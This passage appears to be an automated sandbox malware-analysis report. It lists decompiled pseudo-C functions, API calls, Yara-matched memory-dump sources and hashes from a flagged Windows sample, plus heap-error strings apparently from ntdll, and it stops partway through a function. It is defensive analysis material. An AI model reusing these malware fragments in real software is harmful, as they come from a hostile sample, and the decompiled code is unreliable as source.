                                                Uniqueness Score: -1.00%

                                                Function 016296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 56ef4acd4ea89477c3d5506fc8193ade44c2a3116096e05eb886a4ce421b0112
                                                • Instruction ID: 54d54339fbb4ad8949e848d2a580cd2b0e74b5c8d71f0fbf35f260f6f670db86
                                                • Opcode Fuzzy Hash: 56ef4acd4ea89477c3d5506fc8193ade44c2a3116096e05eb886a4ce421b0112
                                                • Instruction Fuzzy Hash: BE90027121108802D1106599880574B0009A7D0342F95D411A4414658DC6D588A17161
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00409AB0, Relevance: .1, Instructions: 92COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                • Instruction ID: 0b46cc9625fd597f0f1293e0fe630cc8c1f9f1e3f005c30533d49d025d22dd75
                                                • Opcode Fuzzy Hash: bf70d19deb8b7dbf65a1c14f2d3141162741e3067e6603a799ea80fa30cdc1c2
                                                • Instruction Fuzzy Hash: 97210AB2D4020857CB25D674AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A662, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateFree
                                                • String ID: 6EA
                                                • API String ID: 2488874121-1400015478
                                                • Opcode ID: 7a6946832284c6a788ca7581af316f1e94784796e294c7bc71b2eda617af5f71
                                                • Instruction ID: 0b9c81baa72dd2b3b1115085b150bd04bf3c17f68d08a4dc954beb47b7528561
                                                • Opcode Fuzzy Hash: 7a6946832284c6a788ca7581af316f1e94784796e294c7bc71b2eda617af5f71
                                                • Instruction Fuzzy Hash: 4BF090B52002056BCB10EFA9DC40CEB3768EFC8224B14855AFC5C93202C634D9658AB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A65D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID: 6EA
                                                • API String ID: 1279760036-1400015478
                                                • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction ID: b63900df46c74d48569035b2bcc9be016157083d4ef88d1b541c797289a4eec1
                                                • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                • Instruction Fuzzy Hash: 46E012B1200208ABDB14EF99CC41EA777ACEF88664F158559BA085B242C630F9118AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A806, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 62%
                                                			E0041A806(void* __edi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				void* __ebp;
				int _t18;
				void* _t25;

				asm("in al, 0x6e");
				if(__eflags < 0) {
					asm("daa");
					_t25 = __edi - 1;
					asm("loope 0x57");
					_t15 = _a4;
					E0041AF60(_t25, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x46);
					_t18 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
					return _t18;
				} else {
					if (__eflags < 0) goto L6;
				}
			}






                                                0x0041a808
                                                0x0041a80a
                                                0x0041a7c8
                                                0x0041a7c9
                                                0x0041a7cf
                                                0x0041a7d3
                                                0x0041a7ea
                                                0x0041a800
                                                0x0041a804
                                                0x0041a80c
                                                0x0041a80f
                                                0x0041a810

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 7d65c19931cba949d74fdcd9560ac0d205cca2ec8780b5c3630a5e300f37c96e
                                                • Instruction ID: 08ff7fbf91921929e98d3eab7152402f061d2df424c27a3aa53a784102fc98a1
                                                • Opcode Fuzzy Hash: 7d65c19931cba949d74fdcd9560ac0d205cca2ec8780b5c3630a5e300f37c96e
                                                • Instruction Fuzzy Hash: 501102B12012086FD710EF98DC85EE737A8EF85724F148466FD0C9B342D535EA6187E5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00408310, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 19%
                                                			E00408310(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				void* _t24;
				intOrPtr* _t25;
				void* _t26;

				_v68 = 0;
				E0041BE60( &_v67, 0, 0x3f);
				E0041CA00( &_v68, 3);
				_t24 = _a4 + 0x1c;
				_t12 = E0040ACF0(_t24, _t24,  &_v68); // executed
				_push(0xc4e7b6d6);
				_push(0);
				_push(0);
				_push(_t12);
				_push(_t24);
				_t13 = E00414E50();
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t33 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E0040A480(_t33, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                0x0040831f
                                                0x00408323
                                                0x0040832e
                                                0x0040833a
                                                0x0040833e
                                                0x00408343
                                                0x00408348
                                                0x0040834a
                                                0x0040834c
                                                0x0040834d
                                                0x0040834e
                                                0x00408353
                                                0x0040835a
                                                0x0040835d
                                                0x0040836a
                                                0x0040836c
                                                0x0040836e
                                                0x0040838b
                                                0x0040838b
                                                0x00000000
                                                0x0040838d
                                                0x00408392

                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004082D3, Relevance: 1.5, APIs: 1, Instructions: 49threadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID:
                                                • API String ID: 1836367815-0
                                                • Opcode ID: ee276f1ef661cf63882cdaf779ebc2aeb5d586def019d84a84c5ecfb163201ae
                                                • Instruction ID: 7e96499203170bea1d34153ca5a10a7836bfc5a2e72c6933cd3c7ae4462c884d
                                                • Opcode Fuzzy Hash: ee276f1ef661cf63882cdaf779ebc2aeb5d586def019d84a84c5ecfb163201ae
                                                • Instruction Fuzzy Hash: E2F0213678021C62E31465597C43BFF73549BC0B25F14017FFE48EA2C1E9B9545642E6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A670, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction ID: 086aab0bc8c344d6c60c9bbd5a0512cabfd8005857d16272e4a7e29987098a06
                                                • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                • Instruction Fuzzy Hash: C1E012B1200208ABDB18EF99CC49EA777ACEF88764F118559BA085B242C630E9108AB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A7D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E0041AF60(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}





                                                0x0041a7ea
                                                0x0041a800
                                                0x0041a804

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction ID: 3f9aab8e47c10174471559fee5d267dc63a882ce56825bdd12c8e63267ac542a
                                                • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                • Instruction Fuzzy Hash: 23E01AB12002086BDB10DF49CC85EE737ADEF88654F118155BA0C57241C934E8118BF5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A6A2, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E0041A6A2() {
				int _v0;
				intOrPtr _v4;
				signed int _v117;
				char _t7;
				signed int _t13;
				void* _t15;
				void* _t16;

				_t16 = _t15 + 1;
				 *[fs:esi-0x5] = _t7;
				_push(ds);
				asm("clc");
				_v117 = _v117 | _t13;
				_t8 = _v4;
				_push(0x17a00ebe);
				E0041AF60(_t16, _v4, _v4 + 0xc7c,  *((intOrPtr*)(_t8 + 0xa14)), 0, 0x36);
				ExitProcess(_v0);
			}










                                                0x0041a6a2
                                                0x0041a6a4
                                                0x0041a6ad
                                                0x0041a6ae
                                                0x0041a6af
                                                0x0041a6b3
                                                0x0041a6bc
                                                0x0041a6ca
                                                0x0041a6d8

                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: f78c6555b27de646f7765b8dfe6d6f017e464a20bfd60f59cc18c3760db5650b
                                                • Instruction ID: 4d55b754e0fc405db531279852011d8989346df78adfeb32bb496a1978c2f1cc
                                                • Opcode Fuzzy Hash: f78c6555b27de646f7765b8dfe6d6f017e464a20bfd60f59cc18c3760db5650b
                                                • Instruction Fuzzy Hash: BDE0DF71901304BBC320CB68CC85FC77BA8DF49750F0584A9B858A7242C1319A00CAA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041A6B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0041A6B0(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E0041AF60(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}




                                                0x0041a6b3
                                                0x0041a6ca
                                                0x0041a6d8

                                                APIs
                                                • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.401884612.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction ID: 671013aba82168957284564a3a9f05bc2528e3e40ec9789e05460755300894f7
                                                • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                • Instruction Fuzzy Hash: 68D017726002187BD620EB99CC85FD777ACDF48BA4F1580A9BA1C6B242C531BA108AE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0162967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: a1be8856c75d935d263c4bf761cc9390bb84d502e03d9cccd4f108e7696b75bb
                                                • Instruction ID: 2ff74182270983fd707daea04a197ab623bdbf55a6eb914cb22d18bd0074d0b8
                                                • Opcode Fuzzy Hash: a1be8856c75d935d263c4bf761cc9390bb84d502e03d9cccd4f108e7696b75bb
                                                • Instruction Fuzzy Hash: 0AB09B719014E5C9E615D7A44E08717794477D1745F56C061D1020651B4778C095F5B5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 0169B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                Download Yara Rule
                                                Strings
                                                • *** enter .exr %p for the exception record, xrefs: 0169B4F1
                                                • The instruction at %p referenced memory at %p., xrefs: 0169B432
                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0169B314
                                                • The resource is owned shared by %d threads, xrefs: 0169B37E
                                                • *** An Access Violation occurred in %ws:%s, xrefs: 0169B48F
                                                • a NULL pointer, xrefs: 0169B4E0
                                                • *** then kb to get the faulting stack, xrefs: 0169B51C
                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0169B53F
                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 0169B352
                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0169B2F3
                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0169B323
                                                • Go determine why that thread has not released the critical section., xrefs: 0169B3C5
                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0169B38F
                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0169B484
                                                • This failed because of error %Ix., xrefs: 0169B446
                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0169B47D
                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0169B2DC
                                                • *** enter .cxr %p for the context, xrefs: 0169B50D
                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0169B476
                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0169B305
                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0169B3D6
                                                • <unknown>, xrefs: 0169B27E, 0169B2D1, 0169B350, 0169B399, 0169B417, 0169B48E
                                                • an invalid address, %p, xrefs: 0169B4CF
                                                • read from, xrefs: 0169B4AD, 0169B4B2
                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0169B39B
                                                • The resource is owned exclusively by thread %p, xrefs: 0169B374
                                                • *** Inpage error in %ws:%s, xrefs: 0169B418
                                                • The critical section is owned by thread %p., xrefs: 0169B3B9
                                                • The instruction at %p tried to %s , xrefs: 0169B4B6
                                                • write to, xrefs: 0169B4A6
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                • API String ID: 0-108210295
                                                • Opcode ID: d847b03339f8f999a21cda7f107fcfbab47789531343bb38507d6ca22759747c
                                                • Instruction ID: b824e12dfe97d30ce7151076c9fd2968adae06d326f85a81c41fd9c5b2859d05
                                                • Opcode Fuzzy Hash: d847b03339f8f999a21cda7f107fcfbab47789531343bb38507d6ca22759747c
                                                • Instruction Fuzzy Hash: B7810075A40200FFDF31AA4AEC86E7B7B3AEF56A52F40408CF5052F252D3618442DBB6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 016A1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E016A1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x15c48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015EB150();
				} else {
					E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x16d589c);
				E015EB150("Heap error detected at %p (heap handle %p)\n",  *0x16d58a0);
				_t27 =  *0x16d5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M016A1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015EB150();
				} else {
					E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E015EB150("Error code: %d - %s\n",  *0x16d5898);
				_t113 =  *0x16d58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015EB150();
					} else {
						E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015EB150("Parameter1: %p\n",  *0x16d58a4);
				}
				_t115 =  *0x16d58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015EB150();
					} else {
						E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015EB150("Parameter2: %p\n",  *0x16d58a8);
				}
				_t117 =  *0x16d58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015EB150();
					} else {
						E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E015EB150("Parameter3: %p\n",  *0x16d58ac);
				}
				_t119 =  *0x16d58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E015EB150();
					} else {
						E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x16d58b4);
					E015EB150("Last known valid blocks: before - %p, after - %p\n",  *0x16d58b0);
				} else {
					_t120 =  *0x16d58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E015EB150();
				} else {
					E015EB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E015EB150("Stack trace available at %p\n", 0x16d58c0);
			}











                                                0x016a1c10
                                                0x016a1c16
                                                0x016a1c1e
                                                0x016a1c3d
                                                0x016a1c3e
                                                0x016a1c20
                                                0x016a1c35
                                                0x016a1c3a
                                                0x016a1c44
                                                0x016a1c55
                                                0x016a1c5a
                                                0x016a1c65
                                                0x016a1c67
                                                0x00000000
                                                0x016a1c6e
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x016a1c67
                                                0x016a1cdc
                                                0x016a1ce5
                                                0x016a1d04
                                                0x016a1d05
                                                0x016a1ce7
                                                0x016a1cfc
                                                0x016a1d01
                                                0x016a1d0b
                                                0x016a1d17
                                                0x016a1d1f
                                                0x016a1d25
                                                0x016a1d30
                                                0x016a1d4f
                                                0x016a1d50
                                                0x016a1d32
                                                0x016a1d47
                                                0x016a1d4c
                                                0x016a1d61
                                                0x016a1d67
                                                0x016a1d68
                                                0x016a1d6e
                                                0x016a1d79
                                                0x016a1d98
                                                0x016a1d99
                                                0x016a1d7b
                                                0x016a1d90
                                                0x016a1d95
                                                0x016a1daa
                                                0x016a1db0
                                                0x016a1db1
                                                0x016a1db7
                                                0x016a1dc2
                                                0x016a1de1
                                                0x016a1de2
                                                0x016a1dc4
                                                0x016a1dd9
                                                0x016a1dde
                                                0x016a1df3
                                                0x016a1df9
                                                0x016a1dfa
                                                0x016a1e00
                                                0x016a1e0a
                                                0x016a1e13
                                                0x016a1e32
                                                0x016a1e33
                                                0x016a1e15
                                                0x016a1e2a
                                                0x016a1e2f
                                                0x016a1e39
                                                0x016a1e4a
                                                0x016a1e02
                                                0x016a1e02
                                                0x016a1e08
                                                0x00000000
                                                0x00000000
                                                0x016a1e08
                                                0x016a1e5b
                                                0x016a1e7a
                                                0x016a1e7b
                                                0x016a1e5d
                                                0x016a1e72
                                                0x016a1e77
                                                0x016a1e95

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.402914826.00000000015C0000.00000040.00000001.sdmp, Offset: 015C0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                • API String ID: 0-2897834094
                                                • Opcode ID: 311560b79a0458c02236817fdfc24c3f1de33de31e3b88df03393150617911d7
                                                • Instruction ID: a7c268a139332c6c74141c1f5d7c82523ead8ce7f5eb5bb62d17efdd024586e3
                                                • Opcode Fuzzy Hash: 311560b79a0458c02236817fdfc24c3f1de33de31e3b88df03393150617911d7
                                                • Instruction Fuzzy Hash: C761EF37952153DFC329AB8DDC8AE2473E4FB05972F8A802EF50A5F700D6289D418F0A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 015F3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 96%
                                                			E015F3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E015F1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E015F1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L016077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E015F1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E015F1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
